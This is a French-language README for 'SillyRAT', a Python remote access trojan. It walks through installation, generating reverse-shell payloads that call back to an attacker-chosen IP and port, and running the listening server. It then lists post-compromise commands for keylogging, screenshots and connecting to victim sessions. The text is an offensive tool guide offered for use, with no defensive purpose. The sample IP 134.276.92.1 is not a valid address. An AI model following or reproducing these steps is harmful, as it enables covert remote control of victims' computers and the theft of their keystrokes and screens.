
Un RAT basé sur Python 🐀 (Remote Access Trojan) pour obtenir un reverse shell 🖥️

Un RAT multiplateforme écrit en Python pur. Le RAT accepte des commandes accompagnées d'arguments pour agir soit comme serveur qui accepte les connexions, soit comme client/cible qui établit des connexions vers le serveur. La commande generate utilise le module pyinstaller pour compiler le code du payload réel. Ainsi, pour générer le fichier payload pour votre plateforme respective, vous devez être sur cette plateforme lors de la génération du fichier. De plus, vous pouvez également obtenir le fichier source directement.
L'outil est testé sur Parrot OS avec Python 3.8. Suivez les étapes pour l'installation:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
Vous pouvez obtenir le fichier payload de deux manières:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
La version compilée doit être générée sur la plateforme respective. Par exemple, vous ne pouvez pas générer un fichier .exe sur Linux. Vous devez être spécifiquement sur Windows. L'outil est encore en test. Donc toutes sortes d'erreurs sont acceptées. Assurez-vous d'ouvrir une issue néanmoins. Génération de la version compilée pour Linux:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer

Remplacez votre adresse IP et votre port dans les commandes ci-dessus.
Le serveur doit être exécuté sur Linux. Vous pouvez acheter un VPS ou un serveur cloud pour les connexions. Pour information, le serveur ne stocke aucune session de la dernière exécution. Ainsi, toute la progression sera perdue une fois que l'application serveur sera terminée. Lancement de votre serveur:
$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
Toutes les connexions seront listées sous la commande sessions:
$ sessions

Vous pouvez vous connecter à votre session cible avec la commande connect et lancer une des commandes disponibles:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot

Obtenez la liste des commandes disponibles:
$ help
Aide sur une commande spécifique:
$ help COMMAND
Twitter: @hash3liZer
Discord: TheFlash2k#0407